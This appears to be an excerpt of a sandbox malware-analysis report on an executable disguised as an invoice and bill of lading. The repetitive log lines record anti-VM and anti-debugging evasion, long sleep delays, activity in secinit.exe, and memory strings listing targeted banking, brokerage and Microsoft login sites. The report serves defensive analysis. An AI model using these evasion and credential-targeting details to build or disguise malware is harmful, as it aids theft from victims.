                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: INVOICE, PACKING LIST, COPY BL.exe PID: 7544, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\secinit.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: 10B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: 8E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: 9E60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: A070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: B070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: B480000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeMemory allocated: C480000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167096E rdtsc 3_2_0167096E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 1633Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeWindow / User API: threadDelayed 8340Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\secinit.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe TID: 7580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024Thread sleep count: 1633 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024Thread sleep time: -3266000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024Thread sleep count: 8340 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exe TID: 8024Thread sleep time: -16680000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe TID: 8036Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 6_2_02ADC750 FindFirstFileW,FindNextFileW,FindClose,6_2_02ADC750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 472E1186.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 472E1186.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 472E1186.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 472E1186.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 472E1186.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 472E1186.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 472E1186.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 472E1186.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 472E1186.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: secinit.exe, 00000006.00000002.2641601175.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp, 2zqVCuEmR.exe, 00000007.00000002.2642325128.0000000000949000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2056787387.0000017BC095D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 472E1186.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 472E1186.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 472E1186.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 472E1186.6.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 472E1186.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 472E1186.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 472E1186.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 472E1186.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 472E1186.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 472E1186.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167096E rdtsc 3_2_0167096E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_00417CF3 LdrLoadDll,3_2_00417CF3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704164 mov eax, dword ptr fs:[00000030h]3_2_01704164
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704164 mov eax, dword ptr fs:[00000030h]3_2_01704164
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C4144 mov eax, dword ptr fs:[00000030h]3_2_016C4144
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C4144 mov eax, dword ptr fs:[00000030h]3_2_016C4144
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C4144 mov ecx, dword ptr fs:[00000030h]3_2_016C4144
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C4144 mov eax, dword ptr fs:[00000030h]3_2_016C4144
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C4144 mov eax, dword ptr fs:[00000030h]3_2_016C4144
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162C156 mov eax, dword ptr fs:[00000030h]3_2_0162C156
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C8158 mov eax, dword ptr fs:[00000030h]3_2_016C8158
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636154 mov eax, dword ptr fs:[00000030h]3_2_01636154
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01636154 mov eax, dword ptr fs:[00000030h]3_2_01636154
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01660124 mov eax, dword ptr fs:[00000030h]3_2_01660124
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov eax, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov ecx, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov eax, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov eax, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov ecx, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov eax, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov eax, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov ecx, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov eax, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DE10E mov ecx, dword ptr fs:[00000030h]3_2_016DE10E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DA118 mov ecx, dword ptr fs:[00000030h]3_2_016DA118
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DA118 mov eax, dword ptr fs:[00000030h]3_2_016DA118
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DA118 mov eax, dword ptr fs:[00000030h]3_2_016DA118
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DA118 mov eax, dword ptr fs:[00000030h]3_2_016DA118
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F0115 mov eax, dword ptr fs:[00000030h]3_2_016F0115
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017061E5 mov eax, dword ptr fs:[00000030h]3_2_017061E5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016601F8 mov eax, dword ptr fs:[00000030h]3_2_016601F8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F61C3 mov eax, dword ptr fs:[00000030h]3_2_016F61C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F61C3 mov eax, dword ptr fs:[00000030h]3_2_016F61C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE1D0 mov eax, dword ptr fs:[00000030h]3_2_016AE1D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE1D0 mov eax, dword ptr fs:[00000030h]3_2_016AE1D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_016AE1D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE1D0 mov eax, dword ptr fs:[00000030h]3_2_016AE1D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE1D0 mov eax, dword ptr fs:[00000030h]3_2_016AE1D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01670185 mov eax, dword ptr fs:[00000030h]3_2_01670185
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EC188 mov eax, dword ptr fs:[00000030h]3_2_016EC188
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EC188 mov eax, dword ptr fs:[00000030h]3_2_016EC188
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D4180 mov eax, dword ptr fs:[00000030h]3_2_016D4180
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D4180 mov eax, dword ptr fs:[00000030h]3_2_016D4180
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B019F mov eax, dword ptr fs:[00000030h]3_2_016B019F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B019F mov eax, dword ptr fs:[00000030h]3_2_016B019F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B019F mov eax, dword ptr fs:[00000030h]3_2_016B019F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B019F mov eax, dword ptr fs:[00000030h]3_2_016B019F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A197 mov eax, dword ptr fs:[00000030h]3_2_0162A197
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A197 mov eax, dword ptr fs:[00000030h]3_2_0162A197
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A197 mov eax, dword ptr fs:[00000030h]3_2_0162A197
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165C073 mov eax, dword ptr fs:[00000030h]3_2_0165C073
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632050 mov eax, dword ptr fs:[00000030h]3_2_01632050
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6050 mov eax, dword ptr fs:[00000030h]3_2_016B6050
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A020 mov eax, dword ptr fs:[00000030h]3_2_0162A020
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162C020 mov eax, dword ptr fs:[00000030h]3_2_0162C020
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6030 mov eax, dword ptr fs:[00000030h]3_2_016C6030
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B4000 mov ecx, dword ptr fs:[00000030h]3_2_016B4000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D2000 mov eax, dword ptr fs:[00000030h]3_2_016D2000
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E016 mov eax, dword ptr fs:[00000030h]3_2_0164E016
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E016 mov eax, dword ptr fs:[00000030h]3_2_0164E016
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E016 mov eax, dword ptr fs:[00000030h]3_2_0164E016
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E016 mov eax, dword ptr fs:[00000030h]3_2_0164E016
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0162A0E3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016380E9 mov eax, dword ptr fs:[00000030h]3_2_016380E9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B60E0 mov eax, dword ptr fs:[00000030h]3_2_016B60E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162C0F0 mov eax, dword ptr fs:[00000030h]3_2_0162C0F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016720F0 mov ecx, dword ptr fs:[00000030h]3_2_016720F0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B20DE mov eax, dword ptr fs:[00000030h]3_2_016B20DE
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016280A0 mov eax, dword ptr fs:[00000030h]3_2_016280A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C80A8 mov eax, dword ptr fs:[00000030h]3_2_016C80A8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F60B8 mov eax, dword ptr fs:[00000030h]3_2_016F60B8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F60B8 mov ecx, dword ptr fs:[00000030h]3_2_016F60B8
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163208A mov eax, dword ptr fs:[00000030h]3_2_0163208A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D437C mov eax, dword ptr fs:[00000030h]3_2_016D437C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B2349 mov eax, dword ptr fs:[00000030h]3_2_016B2349
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B035C mov eax, dword ptr fs:[00000030h]3_2_016B035C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B035C mov eax, dword ptr fs:[00000030h]3_2_016B035C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B035C mov eax, dword ptr fs:[00000030h]3_2_016B035C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B035C mov ecx, dword ptr fs:[00000030h]3_2_016B035C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B035C mov eax, dword ptr fs:[00000030h]3_2_016B035C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B035C mov eax, dword ptr fs:[00000030h]3_2_016B035C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FA352 mov eax, dword ptr fs:[00000030h]3_2_016FA352
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D8350 mov ecx, dword ptr fs:[00000030h]3_2_016D8350
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0170634F mov eax, dword ptr fs:[00000030h]3_2_0170634F
